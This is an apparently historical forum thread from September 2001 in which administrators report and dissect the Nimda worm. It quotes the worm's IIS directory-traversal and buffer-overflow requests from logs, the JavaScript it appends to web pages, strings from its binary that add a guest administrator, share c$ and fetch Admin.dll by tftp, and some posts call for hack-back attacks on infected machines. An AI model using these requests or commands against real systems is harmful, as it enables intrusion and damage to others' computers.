Look, we're all sick to death of these various Outlook/Office/etc viruses due to the virtually nonexistant security in these applications. Obviously, MS hasn't been particularly interested in fixing the problem and it is highly unlikely that they will fix it anytime soon. Easy is what sells so that is what MS will do, even if it is the "Wrong Thing" to do.
One thing that annoys me though is that MS never seems to get plastered with responsibility for the problem. It's always a "computer virus", never an "Outlook virus" or "Office virus". And maybe that is to some degree our fault. Let me explain that.
Many of us who read Slashdot are techies, sysadmins, and programmers. We're the ones stuck dealing with and often fixing the mess Windows leaves behind. So perhaps, we need to be a little more persistant in placing the blame where it is due.
So here is what I'm going to do, and if it makes sense to you try it too. Henceforth, all viruses, worms, and trojans will be referred to as a Microsoft Outlook Virus or an Microsoft Office Virus. Written with Visual Basic? Fine, it's a Microsoft Office Virus. Takes advantage of Outlook? It's a Microsoft Outlook Virus. Yes that is inaccurate but that's not the point. The point is to make sure everyone is aware of who wrote the crappy software that permitted their computer to crash, why the network borked, and why they lost their files. It's because they insisted on using Microsoft products. I will insist on it, proclaim it from the highest mountain , and oh btw explain that there are alternatives.
Will this destroy Microsoft? No, of course not. But if everyone believes that Microsoft products are virus ridden and that the alternatives aren't it certainly is more likely that the alternatives (*cough*opensource*cough*) will get more consideration.
And if by some miracle enough of a stink is made, maybe, just maybe they'll fix the problem. And that wouldn't be too bad either...
IMO, It looks very unprofessional when someone tries to be professional while hosting their website on a home-level cable modem.
I am going as an A.C. as to not compromise my job.
IU computers are TOTALLY infected with this worm. There is a huge internal attack going on, and my Apache server (also on the IU network) is getting these requests from no less than 10 servers on our network.
IU is a huge FOB (friend of bill). They love their Microsoft crap and they can't get their servers patched correctly. Thus, we have a huge DOS problem from hell.
Exactly. I'm too young too. But I'm not too young to remember Melissa, Kournikova, Code Red, et al. It's constant. It happens all the damn time. And I'm fed up with it.
If it ain't broke, you need more software.
...and it's actually quite clever if you look closely...
MIME-Version: 1.0
Content-Type: multipart/related;
type="multipart/alternative";
boundary="====_ABC1234567890DEF_===="
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1
--====_ABC1234567890DEF_====
Content-Type: multipart/alternative;
boundary="====_ABC0987654321DEF_===="
--====_ABC0987654321DEF_====
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
--====_ABC0987654321DEF_====--
--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID:
Some behavior updates:
I'm seeing hits from 65.x.y.z, 208.x.y.z and 207.x.y.z. My web servers are on 209.x.y.z.
Compared to CodeRed at ~60 probes a day, this one is averaging ~750 probes an hour.
Infected systems that contact me include fraternity Pi Kappa Phi and "leathernecks.net" Marie Corp appreciation site.
There's more to it than this.
Many to one... I wonder If a many to many lawsuit would work?
Let's all bring suit against all the IP holders who remain unpatched after all this time.
Is it MS who is at fault? Yes, at first anyway.
Is it MS's fault if people don't patch their software? No
Nothing to say here... move along
i run a domain in the 63.110.x.x subnet, and this worm is particularly fierce here. I'm logging about 20 attempts per second at peak. Really bizarre.
The IP addresses that these are coming in from are quite varied and seem spread out across the country. Oh well.. maybe people will get a clue and just shut down all the IIS boxes.
I'm not stating that linux is better, it's just that people aren't wasting their time trying to bring down apache servers. I'm really thankful of the fact they haven't targeted apache yet.
As if anyone cares, my first 'hit' was from 63.110.157.49 at 0628 this morning. And yes, this thing is quite spammy.
. echo -e \\04 >
* to the theme of Joan Jett's "I love rock and roll" *
I LOVE IIS, PUT ANOTHER WORM IN MY SERVER BABY!
That's all for now...
Good judgement comes from experience, and experience comes from bad judgement.
- W. Wriston, former Citibank CEO
The following will automatically deny requests on the _FIRST_ request apache gets from the worm.
/scripts/ ""
setuid iptables (yes I don't even want to hear you bitching about this... if you find a better way I want to hear it!)
Then in your httpd.conf file (for apache) add in
ScriptAlias
And put the following script in your cgi-bin dir, don't forget to make it executable
#!/bin/sh
# disable filename globbing
set -f
echo Content-type: text/plain
echo
echo You have now been firewalled...
echo REMOTE_ADDR = $REMOTE_ADDR
/sbin/iptables -t filter -A INPUT -p tcp --dport http --source $REMOTE_ADDR -i eth0 -j DROP
I'm on Earthlink (4.3.x.x) and have 732 different IP's logged trying to hit me using this new technique. Ouch.
Looks like it's spreading.
--- witty signature
Isn't the Internet illegal in Afghanistan? (just like music and TV are illegal there) If so then there really is no point in staging a "cyberwar" against Afghanistan, because they have to infrastructure to target.
Here's the script it adds to the bottom of the page. It does it OUTSIDE the <HTML %gt; </HTML %gt; wrappers to the page, so its really obvious it was just tacked onto the end...
<html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script> </html>
MS has a file named "admin.dll", although I don't know if it is the same one.
admin.dll, 20,540 bytes, MS Web Server Extensions 4.0
admin.dll, 26,744 bytes, MS Web Server Extensions 5.0
Ya I've got a lots of shit like that this morning, when I was looking at my server log... I thought that it's just one of my friends, trying to do something interesting to my server Hmmm... Time to block the IP address I guess. h24-76-99-50.vc.shawcable.net localhost - [18/Sep/2001:09:59:34 -0700] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858% ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%uc bd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531 b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 1698 "" ""
Error reading "e:\default.ida" - The system cannot find the file specified.
h24-76-52-158.vf.shawcable.net localhost - [18/Sep/2001:09:58:25 -0700] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1698 "" ""
Error reading "e:\scripts\..%2f..\winnt\system32\cmd.exe" - The system cannot find the path specified.
h24-76-52-158.vf.shawcable.net localhost - [18/Sep/2001:09:58:24 -0700] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+d ir HTTP/1.0" 404 1698 "" ""
Error reading "e:\scripts\..%5c..\winnt\system32\cmd.exe" - The system cannot find the path specified.
h24-76-52-158.vf.shawcable.net localhost - [18/Sep/2001:09:58:24 -0700] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1698 "" ""
Error reading "e:\scripts\..S5c..\winnt\system32\cmd.exe" - The system cannot find the path specified.
h24-76-52-158.vf.shawcable.net localhost - [18/Sep/2001:09:58:24 -0700] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1698 "" ""
Error reading "e:\scripts\..S5c..\winnt\system32\cmd.exe" - The system cannot find the path specified.
h24-76-52-158.vf.shawcable.net localhost - [18/Sep/2001:09:58:24 -0700] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1698 "" ""
Error reading "e:\scripts\..Áoe..\winnt\system32\cmd.exe" - The system cannot find the path specified.
h24-76-52-158.vf.shawcable.net localhost - [18/Sep/2001:09:58:24 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1698 "" ""
Error reading "e:\scripts\..À..\winnt\system32\cmd.exe" - The system cannot find the path specified.
h24-76-52-158.vf.shawcable.net localhost - [18/Sep/2001:09:58:24 -0700] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1698 "" ""
Error reading "e:\scripts\winnt\system32\cmd.exe" - The system cannot find the path specified.
h24-76-52-158.vf.shawcable.net localhost - [18/Sep/2001:09:58:24 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1698 "" ""
Error reading "e:\scripts\..Á..\winnt\system32\cmd.exe" - The system cannot find the path specified.
From: Chris Grout
Date: Tue Sep 18, 2001 11:52:37 AM America/Montreal
Subject: Re: Worm probes
Appears that if it gets a 404 back from its intial unicode scans, it just keeps looking elsewhere. If the server responds with anything other than a 404 (such as a 403 IP Rejected, in this case...) It attempts to get the server to tftp a file named "admin.dll" from the scanning system.
I pulled the admin.dll from an infected box and to my non-programming eyes, it appears to do at least the following (in no order):
1. Adds the guest account to the local Administrators group and then activates the account
2. Use the anonymous
3. Makes sure c$ is shared
4. Tries to mail a bunch of files. HELO it uses is aabbcc.
5. Looks like admin.dll ends up in "c", "d" and "e".
6. creates a file named readme.exe which is actually a wav file (weird?)
I could be totally wrong here (and probably am) but oh well...
Chris
My God, it's Full of Source!
OUTSIDE_IP=$(dig +short my.ip @outsideip.net)
Ok, many of the hits I've seen have been from IIS servers that, given the following, are likely not even known to exist by those who _should_ know about them:
http://208.144.175.78/
Under Construction
The site you were trying to reach does not currently have a default page. It may be in the process of being upgraded.
So how do these folks running these nimda-ravaged servers get clued in when they may not know they have a server running in the first place???
"If you put the federal government in charge of the Sahara Desert, in 5 years there'd be a shortage of sand". -Milton F.
Georgi Guninski Security Research has some detailed info on the problems with IE executing .eml files. Go here for a small demo.
KangarooBox - We make IT simple!
Just ran it under NT4....explorer (not internet explorer) crashed with a Dr. Watson. The window at 6000,6000 however stayed open. No clue if I'm infected now. (Internet Explorer 5.5 here)
Ahhh...the great dumpster continuum. Many a free computer will be found there. -- sowth (748135)
Can't someone create a worm that patches all these 'open' IIS machines??
I saw this today on MS site, wonder if it might help against this bug/worm MS Download Site
CS majors, we are the geeks that run it all. Without us things die.
and I use Mac OS X
>> DO NOT TRY TO GO TO AN INFECTED IP ADDRESS
I posted earlier in the thread: If you have Javascript disabled in your browser, the EML execution will not happen. It does it via a window.open command.
But everyone here has Javascript disabled for unknown web sites, right?
You can prevent your computer from being infected by disabling the security loophole that allows you to inadvertently execute the worm with Outlook or IE5.
In IE5, go into Tools->InternetOptions->Security->CustomL evel and change the Scripting->Active Scripting to DISABLE. Make sure you do this for each of the 4 Levels (Internet, Intranet, Trusted, Untrusted) to be safe until this thing is under control.
Outlook will inherit your IE settings, but if you want to check and make sure, goto Tools->Options->Security->Zone Settings and check for yourself.
Supposedly this will prevent your IE from executing the website-placed viruses and prevent Outlook from loading the virus when you open the message.
Most of my hits have come from the same class B addresses, but I've got one from a different class A. bankokpost.net
Anyway, I've already sent off one email telling a guy to fix his box.
--
"Karma can only be portioned out by the cosmos." - Homer Simpson [1F10]
Warning! do not look atinfected machines in internet explorer 5 like I just did! D'Oh! Withing seconds it began putting thousands of .eml files on the computers listed in network neighbour hood. The dirves on the other computers were not mapped to drive letters on the infected machines. The names of the names of the eml files seem to be taken from email on the infected machine so they appear relervant!
All its going to take is one major website to be infected
with this and hundreds of thousands of clueless home users will be infected!
Here's how to remove the W32/Minda@MM worm
r re ntVersion\Run\macrosoft
Delete the registry key:
HKEY_CURRENT_USER\Software\Microsoft\Windows\Cu
Restart the computer
Delete README.EXE from the WINDOWS directory as well as from the root directory of all local drives.
mmc.exe may become infected as well.
it seems that we have been attacked by this worm too. for us, the worm first hit us around 9:15pm (+8GMT). it seems to originate from Korea (KRNIC) since our IP prefix is 210.
/scripts directory in IIS or temporary deactivate it. it seems to be targeting a bug somewhere in frontpage extensions or something similar.
/scripts/root.exe /c+dir 404 -
/MSADC/root.exe /c+dir 403 -
/c/winnt/system32/cmd.exe /c+dir 404 -
/d/winnt/system32/cmd.exe /c+dir 404 -
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 -
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/c md.exe /c+dir 500 -
/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/c md.exe /c+dir 404 -
/msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../ winnt/system32/cmd.exe /c+dir 403 -
/scripts/..Á../winnt/system32/cmd.exe /c+dir 404 -
/scripts/winnt/system32/cmd.exe /c+dir 404 -
/winnt/system32/cmd.exe /c+dir 404 -
/winnt/system32/cmd.exe /c+dir 404 -
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 -
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 -
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 -
/scripts/..%2f../winnt/system32/cmd.exe /c+dir 404 -
As a fix, remove the
The 16 lines of codes are:
80 GET
80 GET
80 GET
80 GET
80 GET
80 GET
80 GET
80 GET
80 GET
80 GET
80 GET
80 GET
80 GET
80 GET
80 GET
80 GET
it might be conincidental but this is the one week anniversary of the attacks. there may be a connection.
by the way, the root.exe is cmd.exe. the admin.dll i think comes from frontpage. haven't verified this.
johnlaw
Live your life each day as if it was your last.
This worm also creates an .NWS file along with the other bit and pieces.
Nimda = Admin backward...
I hope Mo won't mind me forwarding this...
/24, then /16.
----- Forwarded message from Mo McKinlay -----
From: Mo McKinlay
Subject: Re: [uknot] Today's Virus
To: uknot@uk.com
Date: Tue, 18 Sep 2001 17:18:46 +0100
X-Virtual-Domain: redirected for markl@ftech.net
X-Virtual-Domain: redirected for hamster@vom.tm
On Tue, Sep 18, 2001 at 04:36:11PM +0100, Joel Rowbottom wrote:
> This seems to be the culprit:
>
> Concept Virus(CV) V.5, Copyright(C)2001 R.P.China
It is.
It's also known as "w32.nimda.mm". From what I can tell, it's delivered
by:
a) visiting an infected site while using vulnerable browser+e-mail
client
b) recieving e-mail from infected host
c) IIS directory traversal exploit (a la codeblue, which I'm informed
was never seen in the wild)
d) open SMB/CIFS shares
It then goes on to:
* perform *numerous* registry hacks - it seems to alter the nameserver
setting of the TCP interface.
* append a small piece of malicious javascript to your default webpage
so that attack vector (a) happens.
* alter the security on your default shares
* alter the performance logging configuration
* attempt to propagate itself to addresses in your
* attempt to propagate itself via e-mail
* attempt to propagate itself to open SMB/CIFS shares
* I've had reports that uses tftp to grab something.. can't ascertain
what/from where, though. this could be confusion.
* it references winzip32.exe for some purpose (could support the
previous report)
* alters your startup parameters to ensure it's re-run at boot time.
That's what I can gather from the various reports, and from scanning the
readme.exe.
Mo.
--
Mo McKinlay mmckinlay@gnu.org http://ekto.org
"but every time you call a function a object orientated fairy dies"
-- Richard Palmer, spod.
GnuPG/PGP Key: pub 1024D/76A275F9 2000-07-22
----- End forwarded message -----
http://www.gimbo.org.uk/
Not only has this a result of negligence but also a result of false claims that their products are just as secure as Unix, just a robust as Unix, and just as fast as Unix. They've mislead consumers regarding by funding biased comparisons, flawed white papers, and paid-customer endorsements. I believe this is nothing short of fraud.
Of course we torture people, we need the information --Gen. Pinochet
One would hope that the numerous bugs and securities loopholes in Windows, and their exploits by Windows worms, would be a wake up call for Corporate IS managers all over the world. Time to sanitize and secure the computing environment, right?
Hah.
Actually, in spite of the huge annoyance caused by these worms, the IS in my Big Company did not bulge. Windows 2000 it is, Linux is for techies, no plan change. A timid note has been sent around saying that IIS servers should be checked against infection... of Code Red. How timely.
I guess the disaster recovery plan of these people still involves some backup server located in the WTC.
For the sake of future air travellers, I hope that we take airport security more seriously than computer security.
Who needs Ben Laden when you have Bill Gates to sabotage the Western world? :-)
--
Mad science! Robots! Underwear! Cute girls! Full comic online! http://www.girlgeniusonline.com/
Nimda is the word: Admin backwards? Just an observation.
Don't think that a small group of dedicated individuals can't change the world. It's the only thing that ever has.
I've also got quite a lot of hits on my home machine because of this Windows junk.
You know, I'm starting to get fed up - Anyone know about a tool/technique which will fire back to these idiots? I mean, I'd love to have a tool which would connect to the attacker and shut down his toy, or, even better, format his harddisk or something.
Anyone got an idea?
Alexander Skwar -- Homepage: http://www.digitalprojects.com | http://www.iso-top.de iso-top.de - Die
Any ideas on how to get rid of the files that are infected?
Yes, my girlfriend is a BitchX
The media are always saying how filthy rich Bin Laden is. Seems to me that tracking down where the money is located would be a much better target (both for governments and independent hackers) than random islamic sites or Afghanistan itself.
I just checked www.internnettraficreport.com. All their indices are down at zero. Very odd.
Perhaps a scriptkiddie who hit "Select All" on the "Infection Method" check box?
Does anyone have more information about the IE5 part of this? How does it spread? What exactly spreads? How do you find out if you are infected and does this also work for IE5.5 and IE6 or is it only IE5.0x?
I checked one of the IPs and it said 'F*ck USA Government,
Aparently that was enough to get the attention of the FBI during the heightened attentions to security. I really pity whoever launched this thing if they aren't affiliated with Bin Laden et al, since any threat to the US government will now be considered an act of wart and will be dealt with accordingly.
The linked article notes that NIPC was anticipating an attack from a group called 'Dispatchers' to hit sometime today.
Work for Change & GET PAID!
Holy cow..
Here at our small hosting company we've noticed a significant increase of traffic this morning. Here's a clip from ONE server's error_log for TODAY ONLY (@ 12:25pm Central):
[root]:# grep "system32" error_log | grep "Sep 18" |wc -l
51624
We've been clocking it, and it appears we're getting about 2 such requests per second. I can't imagine how painful this has got to be for IIS administrators..
http://www.cnn.com/2001/TECH/internet/09/18/intern et.attack.ap/index.html
You really are an illiterate half-wit, aren't you? No wonder you post as Anonymous Coward. Are you a actually a stupid adult or just some short-bus kid from special ed?
Much of what people are talking about lately involves seizing funds from international bank accounts, rather than making it so no one can read the Taliban FAQ on their official site.
This virus isn't affecting just IIS servers.. it's being spread by all Windows computers.
We don't have any IIS servers on our internal network and I'm seeing
Examining the .EML files written to each writable share shows that strings are being grabbed from the source computer's registry and used to name the .EML files to make them appear genuine. However, performing a virus scan on the .EML file shows no viruses present.
What's going on here?!
I wrote a script that will monitor your apache logfile and email administrators notification of their infected machine. It's not as productive as Code Green, but it's not as invasive either.
I forgot this header from the .EML files:
MIME-Version: 1.0
Content-Type: multipart/related;
type="multipart/alternative";
boundary="====_ABC1234567890DEF_===="
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1
--====_ABC1234567890DEF_====
Content-Type: multipart/alternative;
boundary="====_ABC0987654321DEF_===="
--====_ABC0987654321DEF_====
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
--====_ABC0987654321DEF_====--
--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID:
On a system I have that got infected it places an EML file in the startup folder, so when you startup it launches Outlook Express and starts all over again.
Krispy Cream is people
I mimedecoded the readme.eml that one of the infected web pages was trying to send me, and found the following strings in the executable:
S ha res\Security
/add
/add
/active
/add
. %c 1%1c../..%c1%1c..
Concept Virus(CV) V.5, Copyright(C)2001 R.P.China
What's that? A script kiddie virus kit?
SYSTEM\CurrentControlSet\Services\lanmanserver\
share c$=c:\
user guest ""
localgroup Administrators guest
localgroup Guests guest
user guest
open
user guest
I wouldn't know a Windows script if it came up and hit me in the face, but I'll bet dollars to donuts that that's opening up a file share on your entire C drive.
/scripts
/MSADC
/scripts/..%255c..
/_vti_bin/..%255c../..%255c../..%255c..
/_mem_bin/..%255c../..%255c../..%255c..
/msadc/..%255c../..%255c../..%255c/..%c1%1c../.
/scripts/..%c1%1c..
/scripts/..%c0%2f..
/scripts/..%c0%af..
/scripts/..%c1%9c..
/scripts/..%%35%63..
/scripts/..%%35c..
/scripts/..%25%35%63..
/scripts/..%252f..
/root.exe?/c+
/winnt/system32/cmd.exe?/c+
net%%20use%%20\\%s\ipc$%%20""%%20/user:"guest"
tftp%%20-i%%20%s%%20GET%%20Admin.dll%%20
This looks like the list of exploits it tries, and the second last one looks like it's trying to exploit shares.
QUIT
Subject:
From: <
DATA
RCPT TO: <
MAIL FROM: <
HELO
Looks like an SMTP connection script, so I guess it does spread by email as well.
The next Cmdr Taco duplicate will be ready soon, but subscribers can beat the rush and see it early!
Be careful what you wish for...
While e-mail attachments are a particular worry for the Microsoft platform, worms can exist for any platform with security holes -- which is essentially all of them. There have been UNIX worms in the past and there will be UNIX worms in the future.
The major drawback to UNIX worms in the past wasn't that UNIX was super-secure, as some Slashdotters would have you believe, its that 'UNIX' just represented so many different platforms on different processors that a single do-it-all worm would be very difficult to write. This is starting to change as Linux/x86 is adopted more and more...
Anyway, my point is, if people start suing Microsoft over this, Linux distro companies and even potentially individual Linux programmers could also be at risk. If Microsoft's EULA doesn't protect it, why would the no warranty clause of the GPL protect GPL programmers? In essence the licenses are the same in that regard.
Such a lawsuit would be annoying to Microsoft... to Linux companies and individial GPL programmers it would be devestating.
Yes, this happened to Unix. Thirteen (13) years ago.
Sorry, but coding with buffer overrun exploits possible is not merely a mark of shoddy work, it's outright negligent. I was taught not to do this kind of thing in a high school Pascal class. Where do you dredge up programmers that don't realize this kind of thing needs to be protected against?
And yes, always programming in a paranoid "what can go wrong here" mindset can be dragging. It adds tons of lines of code that may never be executed since it's all "just in case" stuff.
Know what? It all pays off the first time one of those "it'll never happen" situations happens and instead of your code blowing up, or creating a security hole, or trashing the data it throws up an error and halts. It doesn't even have to halt nicely (bonus points for that), but halting is a helluva lot better than the alternatives. Do you have any idea how long it takes to debug one of these issues if you don't have proper error handling in?
So no, Unix isn't invulnerable, and yes, those stating otherwise are being somewhat hypocritical. But Microsoft has outright deceived the consumer and practiced gross professional negligence. The patch doesn't make it better. There should never have been a need for this particular patch in the first place.
And I'm not even going to get into the stupidities behind automagically executing files from untrusted sources.
I just found two new *.eml files left on my publicly writable, scratch space Samba shares on my FreeBSD box: demotivational.eml, and pumpkin.eml. You can find them gzipped at my website at:
demotivational.eml.gz
pumpkin.eml.gz
Has anyone else seen these files showing up on their samba shares?
Nick Knouf
Finally, I get to enjoy the fact that I'm on FreeBSD!!!!
Hey, someone else who learned Unix before 1985! Howyadoin?
Here is some information on the virus/worm that the FBI is investigating this morning.
.asp .htm .exe
.asp .htm .exe
.asp .htm .exe
.asp .htm .exe
This morning my IIS server has been hit several times with a worm. The internal name of the worm/virus is Concept Virus(CV) V.5. Another server that was open to the vulnerability downloaded readme.exe to my web client when I visited their web page. You can view a query of these attacks from my log file at http://nasc.uwyo.edu/IISworm.asp. CERT has not released an advisory yet.
I am looking through the code of the readme.exe file. It looks like it infects the following files.
Admin.dll
winzip32.exe
readme.html
main.html
index.html
default.html
winzip32.exe
riched20.dll
It also looks like the worm sends itself using MAPI. It also creates a share on the C:\ drive that is accessible to anyone that logs in as a guest.
I pipe my syslogs out to an old line feed printer, so I can have a hard copy for future reference.
How nice it was to come home on my lunch break and find about 70 pages of:
Sep 18 08:31:53 CS460805-A snort: WEB-MISC http directory traversal: 24.x.x.x:3950 -> 24.x.x.x:80
Sep 18 08:31:53 CS460805-A snort: WEB-MISC http directory traversal: 24.x.x.x:3978 -> 24.x.x.x:80
Sep 18 08:31:53 CS460805-A snort: WEB-MISC http directory traversal: 24.x.x.x:4021 -> 24.x.x.x:80
Sep 18 08:31:53 CS460805-A snort: spp_http_decode: IIS Unicode attack detected: 24.x.x.x:4071 -> 24.x.x.x:80
Sep 18 08:31:53 CS460805-A last message repeated 2 times
From what looks to be about a hundred different addresses on the same class A as mine.
Who are all these people who just haven't learned what a patch is? And can I send them a bill for my paper? Normally I use about one page a day.
Growl.
If you aren't certain that your WinNT box is safe, deny your entire subnet for the time being.
Start ISM/MMC. Expand your computer's view. Right click on your Default Web Site. Choose Properties.
Click on the "Directory Security" tab.
Click the "Edit" button for "IP Addresses and domain name restrictions".
With "By Default, Grant All Computers Access" checked, click the Add... button.
Set the Type to "Group of Computers".
For the Network ID enter the first byte of *your* IP address and the rest 0s (e.g. my IP is 216.27.140.214, so I put in 216.0.0.0).
For the subnet mask, enter 255.0.0.0
Click OK. Your Website will now deny access to anyone in your class A subnet, where this worm is attacking. (How is it spreading across subnets?)
Am I the only one getting 403's when trying to visit cert.org?
--
"Karma can only be portioned out by the cosmos." - Homer Simpson [1F10]
I still think that the timing cannot be coincidental.
By the way, what gives with the "offtopic" comment. Someone must be using a different dictionary to me, I guess.
I, like many out there, have somewhat expensive 404 pages that tries to do smart things, and takes up 20-30k in size. This is causing way too much utilization for me.
/var/log/imeme/
/empty.file
Since I do a lot of virtualhosting, I noticed that this thing always asks for the host "www"
So here is what I added to my httpd.conf to just serve a 0 length file from apache instead of doing the expensive 404:
<VirtualHost *>
ServerName www
SetEnvIf Host "www" dontlog=1
CustomLog foo common env=!dontlog
RewriteEngine On
RewriteLogLevel 0
DocumentRoot
RewriteRule ^(.*)
</VirtualHost>
If someone knows a more elegant way to disable logging, let me know.
~mindlace
CAMBRIDGE, MASSACHUSETTS, U.S.A.
18 Sep 2001, 11:18 AM CST
A new, malicious worm targeting Microsoft Web servers is in the wild and is frenetically scanning the Internet, security experts said today.
Starting this morning, numerous system administrators have observed a dramatic increase in probes from remote systems, according to reports on several mailing lists. The probes, coming sometimes hundreds per minute, appear to be attempting to access several commonly exploited files on sites running Microsoft's Internet Information Server.
According to Johannes Ullrich, operator of the Dshield.org intrusion reporting service, the scans are already tying up some networks.
"For the last few hours, systems are getting hammered with every IIS exploit on the book. Even though most of these exploits are useless, the bandwidth consumed is large," said Ullrich.
Anti-virus researchers at Symantec have released a preliminary analysis of the worm, which they have dubbed "W32.Nimda.A@mm." According to the firm, besides scanning for vulnerable IIS systems, the worm appears to use e-mail to propagate itself, arriving in a file attachment named "readme.exe." The worm also opens up the computer's hard disk as a network share.
According to Elias Levy, chief technology officer for SecurityFocus, the new worm is "very aggressive" and appears to be using elements of several earlier worms.
Log files posted by participants in one mailing list reveal that infected systems attempt "Get" requests to more than a dozen files on target servers. Among the files is root.exe, a program created by two previous worms, Sadmind and Code Red II. Also targeted is cmd.exe, the command program or "shell" installed on all Windows NT systems. The scans also access a file called "admin.dll" which is used by Microsoft's FrontPage product.
While the worm is likely only to infect IIS systems, its probes are consuming resources and bandwidth of all types of Internet-connected devices, according to reports from administrators.
The Computer Emergency Response Team (CERT) said it has begun receiving reports today of a "massive increase in scanning directed at port 80."
Ten days ago, malicious code experts identified a new self-propagating worm which they dubbed Code Blue. Because it exploits a nearly year-old flaw in Microsoft's IIS software known as the Web Server Folder Traversal vulnerability, experts said they did not expect Code Blue to spread widely.
Symantec said Nimda appears to attempt to spread using the same vulnerability as Code Blue.
In an advisory released Monday, the FBI's National Infrastructure Protection Center warned that it expects an increase in denial of service attacks from pro-American vigilantes in the wake of the terrorist attacks on New York and Washington, D.C., last week.
Symantec's information on Nimbda is at
http://www.sarc.com/avcenter/venc/data/w32.nimda.
NIPC's advisory on potential denial of service attacks is at http://www.nipc.gov/warnings/advisories/2001/01-0
Reported by Newsbytes, http://www.newsbytes.com .
11:18 CST
Reposted 11:47 CST
Nimda is hammering my server hot and heavy!
http://sdboyd.dyndns.org/Code_Red_report.html
http://sdboyd.dyndns.org/nimda_report.html
--------
We don't care. We don't have to.
We're the software monopoly...
--You get one guess, that's all.
Could someone modify to shutdown the servers
after infecting the local net, please.
At the university I attend, I had noticed severe slowdowns with our network all this morning, and our IS staff sent out an email saying that they were working on the problem. What they didn't mention is that the reason net performance has ground to a halt is that there are multiple infected machines RUN BY IS on the internal LAN. In other words, the people who should know better are the ones running the unpatched IIS boxes! You'd think they would have learned after Code Red....
All threats, or just viruses that contain a threat? I would hate to think that saying something against the government would be considered an act of war.
If tits were wings it'd be flying around.
I agree, but that doesn't mean it ain't bullshit that the big media companies are trying to shut down the peer-to-peer nature of the internet... and if you think that isn't about keeping you glued to the tube, they've already eaten your brain.
Expanding a vast wasteland since 1996.
I think the biggest cause for the spread of it in a corporate environment is that IIS is turned on by default.
Why does MS (and IT departments) have IIS running by default?
Everyone running an OS by now should run a minimum of services/applications by default.
Live and learn I suppose.
An exploit that doesn't follow the rules! How ungentlemanly.
(cf terrorists who ignore the laws)
Here's what I did to stop it so far:
1. Rename the outlookexpress executeable
2. Delete auto-run EML file type thing
3. Delete README.EXE
4. Delete *.EML
5. Make sure there is no *.EML in your startup
6. Reboot
7. Install Linux 8^)
Krispy Cream is people
If anybody knows what URL executes commands on the compromised server or a relatively open hackback that can be scripted looking at apache logs, it would be greatly appreciated.
Before someone gets all uppity about the morality of hackbacks, we're talking harmless start default browser and get pointed at a page telling you how to fix it. This was extraordinarllily effective at getting people patched when code red went about: 5000 hits on day 1 to the patch page, 72 on day 2, and it stayed relatively static after that.
Help us build a better map!
I don't have time yet to write a user space filter for theses annoying requests. So I shutdown my webserver and added the following line to my iptables setup script:
/sbin/iptables -t filter -A INETIN -p tcp --dport 80 -j MIRROR
What I'm wondering is what effect if any would the mirror target do? I'm hoping it'll re-infect itself some more until the process table overloaded and BOOM!...is this true? or should I just redirect to www.microsoft.com?
Run system file checker after you get this. Riched20.dll may be corrupted. My headers looked like this:
d esktopdesktopsamplemakefiledesktopjeditcvsmakefile jeditcvsmakefiledesktopdesktopjeditcvsmakefilesamp lejeditcvsmakefilemakefiledesktopjeditcvssamplemak efilesamplesamplejeditcvsdesktmail-incoming2.ahnet .net.jeditcvs
A AA AAAAAAAAAAAAAAAAAAAAAAAAAA
Received: by mail (mbox 7406.comments)
(with Cubic Circle's cucipop (v1.31 1998/05/13) Tue Sep 18 10:05:38 2001)
X-From_: kuzo01@hotmail.com Tue Sep 18 09:48:25 2001
Return-Path: <kuzo01@hotmail.com>
Delivered-To: 7406.comments@mail.ahnet.net
Received: from NIGHTCRAWLER (unknown [198.31.205.12])
by mail.ahnet.net (Postfix) with SMTP id 5810065B24
for <comments@vrml3d.com.>; Tue, 18 Sep 2001 07:34:22 -0700 (PDT)
From: <kuzo01@hotmail.com>
Subject: ware\Microsoft\WindoJ..b4 á.samplesamplesampledesktopjeditcvssamplemakefile
MIME-Version: 1.0
Content-Type: multipart/related;
type="multipart/alternative";
boundary="====_ABC1234567890DEF_===="
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1
Message-Id: <20010918143422.5810065B24@mail.ahnet.net>
Date: Tue, 18 Sep 2001 07:34:22 -0700 (PDT)
--====_ABC1234567890DEF_====
Content-Type: multipart/alternative;
boundary="====_ABC0987654321DEF_===="
--====_ABC0987654321DEF_====
